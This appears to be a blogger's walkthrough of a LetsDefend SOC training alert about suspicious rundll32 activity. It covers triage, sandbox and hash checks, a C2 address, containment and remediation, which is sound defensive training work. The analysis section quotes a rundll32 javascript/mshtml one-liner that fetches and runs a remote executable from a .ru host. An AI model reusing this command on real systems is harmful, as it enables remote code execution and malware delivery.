LetsDefend SOC Walkthrough | SOC125 — Suspicious Rundll32 Activity
Hello, fellow defenders! It’s TopCyberDawg here, still taking down ALL the alerts from the SOC on the LetsDefend platform. In my pursuit to become a seasoned SOC analyst, my goal is to overexpose myself to practical labs and SOC alerts to prepare myself for when the opportunity knocks.
Thankfully, LetsDefend has an amazing platform that mimics a security operation center, allowing users to work on alerts of different security scenarios.
So, walk with me as I dive into another alert…struggle a bit and sharpen my security skills!
What is LetsDefend?
LetsDefend is a hands-on Blue Team training platform that enables people to gain practical experience by investigating real cyber attacks inside a simulated SOC.
I’m a VIP+ member and find great value in package so far.
What is a SOC?
A Security Operations Center (SOC) is like the command center of an organization’s cybersecurity defense. It monitors digital activities, detects and analyzes threats, and takes action to protect against and respond to cyber incidents, using a combination of technology, processes, and skilled personnel.
What is Rundll32?
Rundll32.exe is a legitimate Windows system process used to run functions stored in DLL (Dynamic Link Library)files. It allows you to execute DLL functions as if they were standalone programs, especially those that are part of the Windows operating system or third-party software.
Event ID 58: Suspicious Rundll32 Activity
This Event ID is concerned with our endpoint “172.16.17[.]49” having suspicious Rundll32 activity. A suspicious EXE was observed on the endpoint as well.
Let’s verify whether it’s true or false.
Table of Contents- Check SOC ticket queue
- Take ownership
- Create case
- Utilize Playbook
- Detection
- Analysis
- Containment
- Remediation
- Report Artifacts & IOCs
- Close ticketCheck the SOC ticket queue
Task 1
The Security Operations Center (SOC) ticket queue is a critical component in managing and responding to cybersecurity incidents. The reasons are Incident Tracking and Management, Prioritization and Triage, Accountability, Reporting, Trend Analysis, and Compliance and Audit Readiness.
LetsDefend’s practice SOC features 3 tabs named “Main Channel, Investigation Channel, and Closed Alerts”.
Navigate to the SOC by clicking “Practice” tab and select “Monitoring” then click the “Main Channel” tab.
Now we can see our SOC ticket queue and see some alerts with various severity levels.
*NOTE*: The action was Allowed.Take ownership
Task 2
Each ticket in the queue is typically assigned to a specific analyst or team, ensuring clear responsibility and accountability for incident resolution. This fosters a structured and organized approach to incident management.
EventID: 58 looks like an interesting alert we can investigate and take down!
Create case
Task 3
Creating a case allows the SOC to prioritize incidents based on severity and potential impact. This helps in ensuring that the most critical issues are addressed first, optimizing resource allocation and response times.
We have already decided to investigate EventID: 58, and we will click the icon under “Action” to make it official.
Utilize Playbook
Task 4
Playbooks are crucial for a Security Operations Center for several reasons. A couple of those reasons are Consistency and Standardization. Playbooks ensure that incident responses are handled consistently across the team. By standardizing procedures, SOC analysts can respond to threats in a uniform manner, reducing the chances of errors or missed steps.
Once we have our case created we can begin running plays from our playbook.
Detection
Task 5
As Analysts, we must verify whether this alert is a true positive or a false positive.
Our SIEM fired off an alert after a suspicious URL appeared in our environment.
*Note* The action has been Allowed.Analysis
Task 6
Analysis is vital for maintaining a robust cybersecurity posture. It allows organizations to proactively identify and mitigate threats, respond effectively to incidents, and continuously improve security measures. By investing in thorough analysis, organizations can better protect their assets, data, and reputation.
Our first play is to define the threat indicator.
Out of the available options, I believed it to only be “Other” or “Unknown outgoing network traffic”.
We can answer this by confirming in the alert details if the Device Action was “Allowed” or “Blocked”. For this alert it was allowed so it was not quarantined from our network.
Now the fun can begin, and we can analyze the potential malware threat.
The included Download link in our alert has been flagged as malicious. Let’s plug it into Hybrid Analysis for sandboxing.
hxxps://files-ld.s3.us-east-2.amazonaws.com/a4513379dad5233afa402cc56a8b9222.zip | zip file
The platform found no threat, but this does not mean we're in the clear at all. Now we can check the hash to see what we can find out.
So, the hash has a bad reputation online. We can now run a Google search with the hash and anyrun. Anyrun is another online sandbox platform, and when we use the unique hash, we can see if any reports have been generated involving the hash in question.
Here we can see the suspicious EXE. They have it labeled as a Trojan/Emotet. During the sandbox testing the EXE was observed connecting out to a C2 address where a dropped file was introduced to the network. This may allow persisteance for the threat actor. Now I don’t expect to see “ws2help.exe” but we get an idea of what the attack looks like as far as actions.
The next play for us to run through is if someone accessed the C2 address. To do so, we need to check the wire aka network logs and the endpoint itself.
We can see via the “Terminal History” that on the date of our alert, firing off a suspicious command was run on the endpoint.
This is not good! We can see the endpoint commanded the use of rundll32.exe.
Command: rundll32.exe javascript:'../mshtml,RunHTMLApplication ';
document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')' | CommndIn short, the command calls out to.
hxxp://ru-uid-507352920.pp.ru/KBDYAK.exeWe ran further analysis on the URL and confirmed it has been flagged as malicious.
Let’s check the URL with Hybrid Analysis now.
The domain is no longer active, so the online sandbox efforts will not work. Let’s check the network connections on the endpoint to find the C2 address.
We can see from the listed IPs that we only have one from our alert date.
C2 Address: 67.68.210[.]95
We have 2 events involved with our C2 address! But only one is tied with our alert date.
Let’s now gather some details on the address!
The address is hosted from Canada, and it has been flagged as malicious.
Containment
Task 7
Containment plays a pivotal role in cybersecurity by limiting the impact of security incidents, protecting data and operations, facilitating effective incident response, preserving evidence for forensic analysis, and ensuring compliance with legal and regulatory requirements.
Containment is necessary for this alert.
Remediation actions
Task 8
Remediation is a fundamental component of a robust cybersecurity strategy. It involves fixing vulnerabilities and addressing security issues to prevent exploitation, protect data, maintain operations, and comply with regulations, ultimately contributing to a more secure and resilient organization.
- Educate our SOC with lessons learned to prepare properly for suspicious URLs.
- Create stronger detection rules.
- Educate the end user.
- Re-image the endpoint and restore from a safe backup.
Report Artifacts & IOCs
Task 9
Once we’ve completed the analysis, we will document the findings in the “Analyst Note” section.
The document should include your reasoning, relevant data or observations, and steps taken during your investigation. It is critical as it provides a record of your analysis and can be used for future reference or in resolving similar alerts.
Close ticket
Task 10
The alert needs to be analyzed to determine if it is a true positive or a false positive. A true positive means the alert is legitimate and requires further action, whereas a false positive means that the alert is a false alarm.
Once the playbook has been completed and all inquiries have been dealt with, including the analysis phase, we must return to the Monitoring page within the Investigation channel to officially close the alert.
Navigate to the “Monitoring” section and “Investigation Channel”.
Click the close alert icon (Check symbol) to the far right.
Are newly closed alert can now be found in the “Closed Alerts” tab.
We can then see that under the “Results” column we have passed the investigation and can click the check icon to see a final report write-up on the entire investigation.
Conclusion
The investigation into the suspicious
rundll32.exeactivity has confirmed the presence of a true positive security incident. Behavioral analysis and threat intelligence correlation revealed that the process was used to execute a malicious DLL outside of its typical usage pattern. The DLL in question exhibited several red flags, including obfuscation techniques, anomalous network connections, and unauthorized persistence mechanisms. The malicious use ofrundll32.exeallowed the threat actor to bypass standard detection mechanisms by masquerading as a legitimate system process.Immediate containment measures were enacted, including isolating the affected host and terminating the malicious process. Additionally, relevant indicators of compromise (IOCs) have been shared with detection teams to update SIEM rules and endpoint protection systems.
This incident highlights the critical need for enhanced monitoring of native Windows utilities and reinforces the importance of behavior-based detection methods. Ongoing investigation will focus on identifying the initial vector and assessing the full scope of the compromise.
Please consider following my journey on my social media accounts below. I will catch you all in the next one, peace.
Linkedin: @tijanhydara
Instagram: @topcyberdawg
Twitter: @topcyberdawg
YouTube: @topcyberdawg
